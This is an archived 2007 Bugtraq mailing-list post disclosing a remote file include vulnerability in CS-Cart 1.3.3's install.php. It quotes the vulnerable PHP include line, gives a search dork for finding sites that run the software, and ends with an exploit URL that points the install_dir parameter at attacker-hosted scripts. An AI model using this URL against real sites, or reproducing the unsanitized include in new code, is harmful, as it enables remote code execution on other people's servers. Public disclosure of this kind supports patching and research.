lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070109233350.31705.qmail@securityfocus.com> Date: 9 Jan 2007 23:33:50 -0000 From: ahmed_labib_hilmy@...oo.com To: bugtraq@...urityfocus.com Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability $$ Script site: http://www.cs-cart.com $$ Dork: Powered by CS-Cart - Shopping Cart Software $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Found: irvian $$ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$Greetz:ibnusina and all $$ Specjal greetz:#hitamputih $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $install_dir = dirname(__FILE__); $install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins'; include $install_dir.'/core/install.php' Expl: http://www.site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts]